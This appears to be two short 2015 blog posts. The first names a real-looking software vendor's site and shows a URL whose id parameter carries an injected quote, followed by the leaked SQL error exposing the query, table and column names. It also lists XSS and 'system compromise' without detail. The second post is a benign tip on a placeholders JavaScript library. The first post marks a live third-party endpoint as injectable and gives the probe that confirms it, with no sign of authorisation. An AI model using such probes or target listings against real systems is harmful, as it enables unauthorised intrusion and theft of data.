Friday, 17 July 2015

http://www.lcsoftware.com/ | sql injection, xss, system compromise

sample:

http://www.lcsoftware.com/lcss-modules/listings/PublicListingController.php?Action=def&id=11%277&statusFilter=40&pageSize=5&pos=0

error:
Failed to execute query:
select listing_id, TITLE, ADDRESS, CITY, ZIP, STATE, PRICE, DESCRIPTION, TYPE_ID, BEDS, BATHS, FLOORS, SQUARE_FEET, LOT_SIZE, GARAGE_SIZE, YEAR_BUILD, ANNUAL_PROPERTY_TAX, STATUS_ID, HOME_FEATURES, COMMUNITY_FEATURES, MLS, USER_ID, CREATED, RANK, IS_FEATURE_LISTING from LCSS_LISTING WHERE USER_ID='11'7' ORDER BY STATUS_ID, PRICE ASC LIMIT 0, 5

Tuesday, 7 July 2015

Fix placeholders an all browsers - internet explorer, firefox, windows, linux, mac

Go to http://jamesallardice.github.io/Placeholders.js/
and download the latest placeholders.min.js

Just add

<script language="javascript" type="text/javascript" src="images/placeholders.min.js"></script>
in your code and the placeholders will work an all the browsers with js support.